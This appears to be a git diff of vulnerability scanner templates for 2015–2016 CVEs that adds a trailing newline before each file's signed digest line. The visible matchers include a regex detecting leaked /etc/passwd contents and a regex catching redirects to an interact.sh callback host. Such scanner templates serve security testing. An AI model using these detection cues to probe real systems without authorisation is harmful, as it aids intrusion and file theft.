a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 6af5b7c009..d187e9c456 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206cda3b8c44476f24646cba077bd4b8d651a9076dd11c7ae6433f76a74ff0094f022100b63f7173ba78e5842ad6ef54be6b39887b76e37f605c91ffce240d050a8ebf3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206cda3b8c44476f24646cba077bd4b8d651a9076dd11c7ae6433f76a74ff0094f022100b63f7173ba78e5842ad6ef54be6b39887b76e37f605c91ffce240d050a8ebf3c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 465d62d649..8955bdd532 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -39,4 +39,5 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a00463044022079d6c549f7345cdb77fa62b1c4d6c09d4751dd677c399280d695a892b271be8c02201ad3944065eb14d53b5a53d8f6a076ae3d35a08d2d62187bdb1de0ae3b4916eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022079d6c549f7345cdb77fa62b1c4d6c09d4751dd677c399280d695a892b271be8c02201ad3944065eb14d53b5a53d8f6a076ae3d35a08d2d62187bdb1de0ae3b4916eb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 3f55c7b178..e4deaa7ca6 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c43032f8d1a15a27ac80ed8bd0eb65396f52926664745b8040d59f2a3edc11a022100bc1e37d1a867a963741ff6b3339e414e8f82a9ffc156af47fd7dff96bcac19db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203c43032f8d1a15a27ac80ed8bd0eb65396f52926664745b8040d59f2a3edc11a022100bc1e37d1a867a963741ff6b3339e414e8f82a9ffc156af47fd7dff96bcac19db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 539b5c2cc7..4ce3d51516 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ef2b05d7b9e4cf6b03cc1eb79ad8e851e933cfc48b34810f24d015234f443dc002200ceb7bce60a76b0d0dde0efdd2be9ff5ddc294f39ca1d2142ab8586f66c403f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ef2b05d7b9e4cf6b03cc1eb79ad8e851e933cfc48b34810f24d015234f443dc002200ceb7bce60a76b0d0dde0efdd2be9ff5ddc294f39ca1d2142ab8586f66c403f0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 0424f12ca6..e53bcc454a 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100a1c00e4f3f3e0a63218cf3f5e5419b16760e2d6eb4c2742c9320fab585bb082802203fa0052dd1a3b3f075684bcd9a38dc6dbe73b396eeec7b96f72c71dc70692c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a1c00e4f3f3e0a63218cf3f5e5419b16760e2d6eb4c2742c9320fab585bb082802203fa0052dd1a3b3f075684bcd9a38dc6dbe73b396eeec7b96f72c71dc70692c27:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index b2d59065f9..9e728f902a 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b0b0fe3fb0ec44b3f0fe89f042786442102f1498ea3db6c7feb4d16d0a7a847022100f2ff5ca271cd33681e5c721a683f720136a40d18a60ea1c688af36f416e24945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200b0b0fe3fb0ec44b3f0fe89f042786442102f1498ea3db6c7feb4d16d0a7a847022100f2ff5ca271cd33681e5c721a683f720136a40d18a60ea1c688af36f416e24945:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 1ae7739287..bd6b06f147 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c4ebfd8ef832f98d845d1658625714451e5cbb11e1258d65dddf86c9dd8a2e802206a3f866cb16a199dace33b05a728add2a86ed03b4c6ccfb3370698c53ed77bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206c4ebfd8ef832f98d845d1658625714451e5cbb11e1258d65dddf86c9dd8a2e802206a3f866cb16a199dace33b05a728add2a86ed03b4c6ccfb3370698c53ed77bad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 1f14386646..d9ba6abd4c 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -37,4 +37,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502202355147513fd1ddd2648075df8fcdf50028b22efff7a22e7c931e79da4348679022100e53a5785341435ebd1f535e7f67f5e19eb1ecbcdbabca7711139c459f368cb38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202355147513fd1ddd2648075df8fcdf50028b22efff7a22e7c931e79da4348679022100e53a5785341435ebd1f535e7f67f5e19eb1ecbcdbabca7711139c459f368cb38:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index be41df2118..abf0f0abb7 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -49,4 +49,5 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "404-to-301")' condition: and -# digest: 490a0046304402201fd3be63fda2239b875cc7235813cf2dbdbd2892f25c0b59e818753db524f1cf022069ef96e57fa36c01966aa02494863385ecf486a377b9ae35f490493bf0ddd7b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201fd3be63fda2239b875cc7235813cf2dbdbd2892f25c0b59e818753db524f1cf022069ef96e57fa36c01966aa02494863385ecf486a377b9ae35f490493bf0ddd7b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 7721b6855c..b3ac5d797d 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022063adae107a9f19ff20c690c4545a12d915a08f69098733555d2bf26d4cade884022100c3f92e55dccd77e1f79412940abf634286d2a0746e15d16b34ff01c89626a70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022063adae107a9f19ff20c690c4545a12d915a08f69098733555d2bf26d4cade884022100c3f92e55dccd77e1f79412940abf634286d2a0746e15d16b34ff01c89626a70f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 359efe6a88..abcada450c 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210093a43a4ea9de09f229603fd1d2a4fe05e9cff935a10451896d04bc7a47de111b02203ad24e050bbab373167422d4fc421a5aec33317f1ef59b7d22980212faf28dc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210093a43a4ea9de09f229603fd1d2a4fe05e9cff935a10451896d04bc7a47de111b02203ad24e050bbab373167422d4fc421a5aec33317f1ef59b7d22980212faf28dc9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 77fdb01794..dddbce30ef 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ccdd0727e4fadacfa1cfbb05f28315d00d5f5f364f7f48c515f99407ba0c6e9022100cb6b8507f70c92dfe65fc5640cf8a9769683e5f6e35bf8acf564d2f7d9ac81c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202ccdd0727e4fadacfa1cfbb05f28315d00d5f5f364f7f48c515f99407ba0c6e9022100cb6b8507f70c92dfe65fc5640cf8a9769683e5f6e35bf8acf564d2f7d9ac81c2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index b3bfd1a3c0..3820e4f136 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c1d38445741de067176a52ad013ab1b0dd3d64d78c1b5104ef27ecfe0410c2cf02203ab706c2607fa836e34752fd8248d1ad4730bce479a92b3539f8c933dd7572f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c1d38445741de067176a52ad013ab1b0dd3d64d78c1b5104ef27ecfe0410c2cf02203ab706c2607fa836e34752fd8248d1ad4730bce479a92b3539f8c933dd7572f7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index bc49a57576..0727fcea89 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b049b6130e04ca0e4c4197eda3adf565121e5c5cefceb4828da30cad35489a4d022100b1b7264a4291cf26c067bd06f826b1649e55a802168ebc33c4013293bca7ae12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b049b6130e04ca0e4c4197eda3adf565121e5c5cefceb4828da30cad35489a4d022100b1b7264a4291cf26c067bd06f826b1649e55a802168ebc33c4013293bca7ae12:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index dcd95ab1f9..046a8a0efa 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a8b42c4cdc654d85e347db6c1b5d0579eaceb6380cd6637230786e9cca883e2d022100f936c4b583a33591e6c932a3295da800405231c749197d77c99a8eba3861b747:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a8b42c4cdc654d85e347db6c1b5d0579eaceb6380cd6637230786e9cca883e2d022100f936c4b583a33591e6c932a3295da800405231c749197d77c99a8eba3861b747:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index dac262a0d5..5d4d5a5492 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210088ca91b4a7b0c8e05b86e49d21ba7b67cd3b508402852bc30da0bfda4923ca2202200b76cb4e795f9081c607f0c7f12a9f40e6e8a3bb860e656ac5d164eab23ee2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210088ca91b4a7b0c8e05b86e49d21ba7b67cd3b508402852bc30da0bfda4923ca2202200b76cb4e795f9081c607f0c7f12a9f40e6e8a3bb860e656ac5d164eab23ee2d8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 446a1271e2..e05b2d51c8 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220679a6fd58cf8ac06c900c154a4e240392ef1622a73c1750e154083371e4fce4d022100d93bf3b357a5409a8cbbba21d2254ceacc28791220b08dbd052ad5ae33599bc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220679a6fd58cf8ac06c900c154a4e240392ef1622a73c1750e154083371e4fce4d022100d93bf3b357a5409a8cbbba21d2254ceacc28791220b08dbd052ad5ae33599bc2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index 8673028f0f..9b0677d2da 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ac667bcdfbc2e24d75478ece27bd3ed18de3a624c6a730d0282afb06cbd6651202201c08d5902a10147f66d710e36796d4dd9059af2c63e2f6d75fe9549f9f273d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ac667bcdfbc2e24d75478ece27bd3ed18de3a624c6a730d0282afb06cbd6651202201c08d5902a10147f66d710e36796d4dd9059af2c63e2f6d75fe9549f9f273d97:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 2d99655222..20204ad08d 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201b299fe059a419a8cb759cce51032bdcdec938276f59e0f82ec94f0bab6a38a70221008bea75b60717701a616d84d85d231bf177bfca58a9ed0dd05bfe52950dfa6f2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201b299fe059a419a8cb759cce51032bdcdec938276f59e0f82ec94f0bab6a38a70221008bea75b60717701a616d84d85d231bf177bfca58a9ed0dd05bfe52950dfa6f2c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index ddf72f57cf..dd923117f8 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a1b98583d69fa887e2426319938e75038e56aa0a25d4d20d4badbbb0c1677568022100b33b6a55fd9e93f95a209faad405ee7de2d0803e332f645a395a64764233bc3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a1b98583d69fa887e2426319938e75038e56aa0a25d4d20d4badbbb0c1677568022100b33b6a55fd9e93f95a209faad405ee7de2d0803e332f645a395a64764233bc3f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index fef58da2ac..77ce95d174 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c30b3344cb5fc0c073b0417f158a07cc4b89ca6787750fcddfebf22d54cf5e72022100c065f477d20ca85d97b6c956e72aacfad985195c4b136dc378011c92e4e2ae14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c30b3344cb5fc0c073b0417f158a07cc4b89ca6787750fcddfebf22d54cf5e72022100c065f477d20ca85d97b6c956e72aacfad985195c4b136dc378011c92e4e2ae14:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 21eb775b34..0fac7f6cd3 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207bcb89bce97dc9c30ad2d7977c7e33d9dad309adc674fbff3daa3b566943130b0221009376a273ad9ab4889c216bd28525044b4f8bd4cff2d1e80c4a414c1203aa5ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207bcb89bce97dc9c30ad2d7977c7e33d9dad309adc674fbff3daa3b566943130b0221009376a273ad9ab4889c216bd28525044b4f8bd4cff2d1e80c4a414c1203aa5ae9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 53ddbdc991..c6a4d75e41 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200783a9e7203d930df082321e822f4c39e0c6c9635a2a3ee95c99b944da71282802201c7d8c3f212221994318fdd379c9faa0875902c7bc64a9321bdc3a46a4f2ae16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200783a9e7203d930df082321e822f4c39e0c6c9635a2a3ee95c99b944da71282802201c7d8c3f212221994318fdd379c9faa0875902c7bc64a9321bdc3a46a4f2ae16:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 5bced0893c..e6072844b5 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fd123dc7cc23cbce37308139dd3a1ad562194b9db9315724886812e9f83cdc850220190193a7d4ef442c89e00022ce6dfa01a3ce20cd259994e7f54d8fc0e26e71d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fd123dc7cc23cbce37308139dd3a1ad562194b9db9315724886812e9f83cdc850220190193a7d4ef442c89e00022ce6dfa01a3ce20cd259994e7f54d8fc0e26e71d6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 50b16d53f4..f751c8751c 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ad101bce29ff86536ece1a53691fbe91162aa2d0dc44fd3bda64818e8251236022063d6153ccfcc7c70e57416feb323b3a731789eed651c9dae9a592ac2b27329e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207ad101bce29ff86536ece1a53691fbe91162aa2d0dc44fd3bda64818e8251236022063d6153ccfcc7c70e57416feb323b3a731789eed651c9dae9a592ac2b27329e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index f362fed146..d7a4e6fd43 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022011f9a3a2cd73680e60d26a9034e4120c3ab0875c8fba946459275f5e5195c918022063db3be4cd47e364bc3a0873fcf045bcb8a138fc5de1d511f5e67d93c0f6b757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022011f9a3a2cd73680e60d26a9034e4120c3ab0875c8fba946459275f5e5195c918022063db3be4cd47e364bc3a0873fcf045bcb8a138fc5de1d511f5e67d93c0f6b757:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index a98521e74a..d7ecae3e83 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205637050a26dd3d8a7e3fa234a32985e9ff903ac08d4584b199da1d8c55fb0c03022020649ca030a5d7924bc8d226ef7e09c7a55142bb8ac66eab1efe35211f3bde92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205637050a26dd3d8a7e3fa234a32985e9ff903ac08d4584b199da1d8c55fb0c03022020649ca030a5d7924bc8d226ef7e09c7a55142bb8ac66eab1efe35211f3bde92:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index f410dabe01..9e9f1878ac 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022047f6131f994004060363e72cd7cf1cba149a9f4000d70e0665a0c5d5da42b558022100b1c972595cb1e2ea5a316981843e6f5e4f09acc5d5e0324adb7d8f262a082970:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022047f6131f994004060363e72cd7cf1cba149a9f4000d70e0665a0c5d5da42b558022100b1c972595cb1e2ea5a316981843e6f5e4f09acc5d5e0324adb7d8f262a082970:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index c808e7c653..c437011612 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204bb66d967b52ea05ff3cd4d45dadcbf970c5f7803e5f9e434dc6e92e3a57a813022010982b7c0d2bbda5196f00a4d9bb56681a32a2d84e463a003e7b8b7cffd6ac9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204bb66d967b52ea05ff3cd4d45dadcbf970c5f7803e5f9e434dc6e92e3a57a813022010982b7c0d2bbda5196f00a4d9bb56681a32a2d84e463a003e7b8b7cffd6ac9a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 42dbd1ee71..98979d0c94 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100811edc6a92cc704cb81f8a4ef1462deaadb11903ac32909a6d07f37176bc9b2502204f24ba04411b9cce72c3ed904470bef9583656403c0def5ba9fe8137c92f0f83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100811edc6a92cc704cb81f8a4ef1462deaadb11903ac32909a6d07f37176bc9b2502204f24ba04411b9cce72c3ed904470bef9583656403c0def5ba9fe8137c92f0f83:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index e8107ff32b..de9ebe049e 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100842ecb9f8dce3ecdcde46f9458eb2e7a2e553fe490462b8f81b988e0e274a528022012218fae14b45e3c7a726d9f87011b413013cc3973617ac736a43530f4a5188c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100842ecb9f8dce3ecdcde46f9458eb2e7a2e553fe490462b8f81b988e0e274a528022012218fae14b45e3c7a726d9f87011b413013cc3973617ac736a43530f4a5188c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index cbd4fdacb9..743252048c 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d365446cb4ac0b6fb05fbf5e4c6d004190f2318cc437ecc860e59603ae3f4cb3022100d84e9c87bd3f1399454a784787838f5a9c7a642802fd5414d98c986e976899a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d365446cb4ac0b6fb05fbf5e4c6d004190f2318cc437ecc860e59603ae3f4cb3022100d84e9c87bd3f1399454a784787838f5a9c7a642802fd5414d98c986e976899a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 684f625150..7d8edb2de9 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201b33d9ccf174bc85af355d7b5dcd0f12d87b0192dcfeaf9582f7c0930c386c27022100e7af64969b57a8589905c4d86aeb7d75ba9ab57a4dbe1cbd313bf6f893174368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201b33d9ccf174bc85af355d7b5dcd0f12d87b0192dcfeaf9582f7c0930c386c27022100e7af64969b57a8589905c4d86aeb7d75ba9ab57a4dbe1cbd313bf6f893174368:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index b7d389ff54..f2203e8405 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c8683a81fdab01affed454fb5034058b13d53ff4effb2c831951702e5ee873c1022063c651d4004aea3da3dc49174a157bb9ea203bd5480b432adb155275864dc6c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c8683a81fdab01affed454fb5034058b13d53ff4effb2c831951702e5ee873c1022063c651d4004aea3da3dc49174a157bb9ea203bd5480b432adb155275864dc6c8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 97883afa80..c8dbc93fb8 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100973f4048abedd14a24a0c59079e9ffc0d94720185cfc71fa91c47ee060ffa295022100908bd3846398e0e5d8a792ee41252bae0ba683ba4a963b7ca2fb82042cb06d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100973f4048abedd14a24a0c59079e9ffc0d94720185cfc71fa91c47ee060ffa295022100908bd3846398e0e5d8a792ee41252bae0ba683ba4a963b7ca2fb82042cb06d51:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 215d37f11a..99ccfe5657 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b759ad18d6b658a449ca45c6da20540ed3e217b9343260f656af2e51f3cef1f40220037dd108ea128e6b59c6d63a2bbe11581a8bb865007a2a1b4f088d649695dbaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b759ad18d6b658a449ca45c6da20540ed3e217b9343260f656af2e51f3cef1f40220037dd108ea128e6b59c6d63a2bbe11581a8bb865007a2a1b4f088d649695dbaf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 4328f02cb2..56838ffcd1 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cebd600ce2b1ab7cae13f8734ed2db0e1606fef4720e736023608336abbad5a8022100ca9827ed1868f30335dd06fb94faaffd89786d431064c70785faff737a5793e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cebd600ce2b1ab7cae13f8734ed2db0e1606fef4720e736023608336abbad5a8022100ca9827ed1868f30335dd06fb94faaffd89786d431064c70785faff737a5793e4:922c64590222798bb761d5b6d8e72950 